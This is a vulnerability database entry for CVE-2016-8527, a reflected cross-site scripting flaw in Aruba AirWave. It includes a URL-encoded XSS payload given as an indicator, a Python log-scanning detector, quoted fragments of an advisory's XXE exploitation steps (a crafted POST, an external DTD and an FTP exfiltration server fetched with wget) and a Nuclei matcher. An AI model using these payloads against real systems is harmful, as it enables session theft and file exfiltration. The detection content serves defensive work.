CVE-2016-8527
Published: 2018-08-06
Priority: P3 · Severity: medium · CVSS 3.0 base score: 6.1 · CVSS 2.0 base score: 4.3
CVSS 3.0 vector: AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Flags: EXPLOIT · EPSS: 13.16% (95.9th percentile)
Aruba Airwave all versions up to, but not including, 8.2.3.1 is vulnerable to a reflected cross-site scripting (XSS). The vulnerability is present in the VisualRF component of AirWave. By exploiting this vulnerability, an attacker who can trick a logged-in AirWave administrative user into clicking a link could obtain sensitive information, such as session cookies or passwords. The vulnerability requires that an administrative user click on the malicious link while currently logged into AirWave in the same browser.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hewlett_packard_enterprise | aruba_airwave | — | — |
| hp | airwave | < 8.2.3.1 | 8.2.3.1 |
Detection & IOCs (extracted from sources)
url: /visualrf/group_list.xml?aps=1&start=%3ca%20xmlns%3aa%3d'http%3a%2f%2fwww.w3.org%2f1999%2fxhtml'%3e%3ca%3abody%20onload%3d'alert(/XSS/)'%2f%3e%3c%2fa%3e&end=500&match
yara: alert(document.domain)
- CVE-2016-8527 XSS is triggered via HTTP GET parameters 'start' or 'end' on the /visualrf/group_list.xml endpoint. Monitor for URL-encoded HTML/script injection in these parameters.
- The reflected XSS payload uses an XML namespace trick: a URL-encoded <a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(/XSS/)'/></a> injected into the 'start' parameter. Detect URL-encoded xhtml namespace strings in GET requests to /visualrf/group_list.xml.
- Session cookies or passwords may be exfiltrated via the reflected XSS. Monitor for outbound requests from AirWave admin browser sessions to unexpected external hosts shortly after access to /visualrf/group_list.xml.
- The Nuclei probe for this CVE checks for alert(document.domain) in the response body and Content-Type: text/html with HTTP 200. Use these as detection criteria in web application firewall or IDS rules.
- All Aruba AirWave versions up to but not including 8.2.3.1 are affected. Versions 8.2.3 and below were confirmed vulnerable at time of discovery.
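As an added example (not part of this record, the vendor's code or the Nuclei template), a small Python scanner that applies the detection notes above to constructed access-log lines: it flags GET requests to /visualrf/group_list.xml whose start or end parameter carries markup once URL-decoded, including double-encoded values, and ignores the same markup on unrelated paths.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus
TARGET_PATH = "/visualrf/group_list.xml"   # endpoint named in the notes above
WATCHED_PARAMS = ("start", "end")          # parameters the XSS reflects

# Markup that should never appear in a numeric paging parameter: tags,
# event handlers, javascript: URLs and the xhtml namespace from the payload.
SUSPICIOUS = re.compile(
    r"<\s*/?\s*[a-z]|\bon[a-z]+\s*=|javascript:|xmlns|www\.w3\.org/1999/xhtml",
    re.IGNORECASE)

def fully_decode(value: str, rounds: int = 3) -> str:
    """URL-decode repeatedly so double-encoded payloads are still caught."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify_request(method: str, target: str) -> list:
    """Names of watched parameters carrying markup; [] if the request is clean.
    `target` is the logged request-target (path plus query string)."""
    parts = urlsplit(target)
    if method.upper() != "GET" or parts.path != TARGET_PATH:
        return []
    params = parse_qs(parts.query, keep_blank_values=True)
    return [name for name in WATCHED_PARAMS
            if any(SUSPICIOUS.search(fully_decode(v)) for v in params.get(name, []))]

# Constructed sample access-log lines (Common Log Format), not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Mar/2017:10:00:01 +0000] "GET /visualrf/group_list.xml?aps=1&start=0&end=500 HTTP/1.1" 200 812
10.0.0.9 - - [01/Mar/2017:10:00:07 +0000] "GET /visualrf/group_list.xml?aps=1&start=%3ca%20xmlns%3aa%3d'http%3a%2f%2fwww.w3.org%2f1999%2fxhtml'%3e%3ca%3abody%20onload%3d'alert(1)'%2f%3e%3c%2fa%3e&end=500 HTTP/1.1" 200 1203
10.0.0.9 - - [01/Mar/2017:10:00:09 +0000] "GET /visualrf/group_list.xml?aps=1&start=0&end=%253Cscript%253E HTTP/1.1" 200 990
10.0.0.2 - - [01/Mar/2017:10:00:11 +0000] "GET /index.html?start=%3Cb%3E HTTP/1.1" 200 2048
"""
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def scan_log(text: str) -> list:
    """(line_number, flagged_params) for each suspicious request in the log."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = LOG_RE.search(line)
        if m and (hits := classify_request(m["method"], m["target"])):
            findings.append((lineno, hits))
    return findings

if __name__ == "__main__":
    for lineno, hits in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: markup in parameter(s) {', '.join(hits)}")
```

The third sample line shows why decoding is repeated: a double-encoded value passes a single-decode filter but still renders as markup once the application decodes it again.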
CVSS provenance
- NVD, CVSS v3.0: 6.1 MEDIUM, CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- NVD, CVSS v2.0: 4.3 MEDIUM, AV:N/AC:M/Au:N/C:N/I:P/A:N
No detection rules found.
Exploit-DB
Aruba AirWave 8.2.3 - XML External Entity Injection / Cross-Site Scripting
exploitdb·2017-03-01·CVSS 8.8
---
SEC Consult Vulnerability Lab Security Advisory
title: XML External Entity Injection (XXE), Reflected Cross Site Scripting
product: Aruba AirWave
vulnerable version:
Floor Plans > Select 'View' under 'Network' section.
Select a campus (e.g. Default Campus) > Select 'Edit' >
Select action 'Export Floor Plans' > Ok
POST /visualrf/backup_sites HTTP/1.1
Host:
[...]
xml=:1234/sectest.dtd">%25%66%6f%6f%3b%25%70%61%72%61%6d%31%3b]>%26%65%78%66%69%6c%3b
$ cat sectest.dtd
">
:2121/%data;'>">
$ python -m SimpleHTTPServer 1234
$ wget https://raw.githubusercontent.com/ONsec-Lab/scripts/master/xxe-ftp-server.rb
$ ruby xxe-ftp-server.rb
FTP. New client connected
230 more data please!
230 more data please!
230 more data
Nuclei
Aruba Airwave <8.2.3.1 - Cross-Site Scripting
nuclei·CVSS 6.1
Matcher fragment of the template (response body, Content-Type header and status):

```yaml
      - type: word
        part: body
        words:
          - "alert(document.domain)"
      - type: word
        part: header
        words:
          - text/html
      - type: status
        status:
          - 200
# digest: 4a0a0047304502204c3c934106736b3d6109aa029f8e8146defd0c558ef0aa5af18af0053adf3f35022100e4072263462f7e4db47b5b4728d60bfbe4ab98a0e9628f36de074b6fb93aeec7:922c64590222798bb761d5b6d8e72950
```